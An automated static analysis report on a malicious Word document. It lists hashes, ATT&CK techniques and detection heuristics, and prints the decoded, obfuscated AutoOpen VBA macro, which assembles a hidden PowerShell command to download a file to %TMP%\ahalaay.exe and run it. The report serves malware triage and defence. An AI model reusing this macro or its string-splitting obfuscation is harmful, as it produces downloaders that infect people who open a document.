Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b862278ccf8180c5…

MALICIOUS

Office (OLE)

57.0 KB Created: 2017-12-01 19:05:00 Authoring application: Microsoft Office Word First seen: 2019-09-30
MD5: d3f0bf59eb3c00210459272b0af8f78b SHA-1: d79f557c2d8eeb905f9c4edf7f2ba92f2147cd69 SHA-256: b862278ccf8180c5b1af7378f7001399d94eecc678949044de2572d7d99b6521
162 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer

The sample contains a VBA macro with an AutoOpen function, which is a common technique for executing malicious code upon opening a document. The script uses CreateObject to instantiate a WebClient, downloads a PowerShell script from a hardcoded IP address, and saves it to the temporary directory as 'ahalaay.exe'. This PowerShell script then executes the downloaded payload.

Heuristics 6

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5731 bytes
SHA-256: 6e1152836b57f8589cd9fce7b1c7b47fee4a37c2f69253ddcb9841945857cf6b
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "iJHuhuuEE"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
ghUEuGUufGUe = OEjfIEhuet + VJIEfuEHt
kiiiHEHu = isdhsut.viishdh
OEjjiEIiieI = pEofOEjfiEOO + IEhufUEh + eoJFieue
KfjjIIhei = "ell"
EIjfiHEUUU = OIEJiEIHFUOO
Set pOIJiJIHuuEUUf = CreateObject( _
"" + kiiiHEHu + "p" + isdhsut.ibhuhug + "h" + KfjjIIhei + "")
pOIJiJIHuuEUUf.Run ovsJIjgijIR(), 0
End Sub
Function ovsJIjgijIR()
OEJfIUhg = "(nE"
PEfkIEJHgw = OEJfIUhg + idhuru.obsjie + "ECT ('" + idhuru.isjgkr + "'+'N'+'et.WebCli'+'en'+'t'))"
PEfkEIg = "'htt" + isjdisr.odsijie + "'"
OEJfiEif = ".('Do"
PEfkoEfijJIE = isdhsut.Caption
IEHuufe = ""
PkeJeifGeg = OEJfiEif + "wn'+'lo" + "ad'+'" + PEfkoEfijJIE + "'"
ispoHEHhpUE = ").Invoke(" + PEfkEIg + ","
OEJfiEhuuEHUteg = "'%TMP%\ahalaay.exe')"
PKEFkoEJfi = "PR"
OJEfEUhfuUE = "oC"
sfwedEFgRHEds = PKEFkoEJfi + OJEfEUhfuUE
OfkOjIejiHE = isdhsut.jixjiihd + "Rt-" + sfwedEFgRHEds + "e`sS '%TMP%\ahalaay.exe';"
oJofjiJE = idhuru.isdihs + "S" + idhuru.Caption + ""
JIhHUUfggF = oJofjiJE & PEfkIEJHgw
JHghuhuGGU = PkeJeifGeg + ispoHEHhpUE + OEJfiEhuuEHUteg + OfkOjIejiHE
uhuGEyfgyGE = JIhHUUfggF & JHghuhuGGU
udgge = "c"
jIheuGtyye = udgge + isdhsut.ibhdur
ovsJIjgijIR = jIheuGtyye + " /c " + uhuGEyfgyGE + " "
End Function

Attribute VB_Name = "idhuru"
Attribute VB_Base = "0{3343F36A-F312-4C39-8869-F1D1C8004CBA}{074600A5-B97F-48C3-B0C2-07E1E8C9AB93}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "isdhsut"
Attribute VB_Base = "0{A2D90AAD-93B1-461B-86A5-7A73E4001827}{37CFA729-20FE-4083-87B8-3C7CA95F168D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "isjdisr"
Attribute VB_Base = "0{7EBE5B37-08CD-4F27-9F34-98F20D0DC93B}{FEFBD8D8-0E76-4DC6-B384-1E8A0BE87549}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

' Processing file: /opt/analyzer/scan_staging/b3898ee1b954426992ac245e604d303f.bin
' ===============================================================================
' Module streams:
' Macros/VBA/iJHuhuuEE - 4276 bytes
' Line #0:
' 	FuncDefn (Sub kiiiHEHu())
' Line #1:
' 	Ld viishdh 
' 	Ld OEjjiEIiieI 
' 	Add 
' 	St isdhsut 
' Line #2:
' 	Ld IEhufUEh 
' 	MemLd eoJFieue 
' 	St pEofOEjfiEOO 
' Line #3:
' 	Ld EIjfiHEUUU 
' 	Ld OIEJiEIHFUOO 
' 	Add 
' 	Ld pOIJiJIHuuEUUf 
' 	Add 
' 	St KfjjIIhei 
' Line #4:
' 	LitStr 0x0003 "ell"
' 	St CreateObject 
' Line #5:
' 	Ld Run 
' 	St ibhuhug 
' Line #6:
' 	LineCont 0x0004 05 00 00 00
' 	SetStmt 
' 	LitStr 0x0000 ""
' 	Ld pEofOEjfiEOO 
' 	Add 
' 	LitStr 0x0001 "p"
' 	Add 
' 	Ld IEhufUEh 
' 	MemLd PEfkIEJHgw 
' 	Add 
' 	LitStr 0x0001 "h"
' 	Add 
' 	Ld CreateObject 
' 	Add 
' 	LitStr 0x0000 ""
' 	Add 
' 	ArgsLd OEJfIUhg 0x0001 
' 	Set ovsJIjgijIR 
' Line #7:
' 	ArgsLd obsjie 0x0000 
' 	LitDI2 0x0000 
' 	Ld ovsJIjgijIR 
' 	ArgsMemCall idhuru 0x0002 
' Line #8:
' 	EndSub 
' Line #9:
' 	FuncDefn (Function obsjie(id_FFFE As Variant))
' Line #10:
' 	LitStr 0x0003 "(nE"
' 	St isjgkr 
' Line #11:
' 	Ld isjgkr 
' 	Ld OEJfiEif 
' 	MemLd PEfkoEfijJIE 
' 	Add 
' 	LitStr 0x0006 "ECT ('"
' 	Add 
' 	Ld OEJfiEif 
' 	MemLd Caption 
' 	Add 
' 	LitStr 0x001C "'+'N'+'et.WebCli'+'en'+'t'))"
' 	Add 
' 	St PEfkEIg 
' Line #12:
' 	LitStr 0x0004 "'htt"
' 	Ld id_02CE 
' 	MemLd id_02D4 
' 	Add 
' 	LitStr 0x0001 "'"
' 	Add 
' 	St PkeJeifGeg 
' Line #13:
' 	LitStr 0x0005 ".('Do"
' 	St ispoHEHhpUE 
' Line #14:
' 	Ld IEhufUEh 
' 	MemLd PKEFkoEJfi 
... (truncated)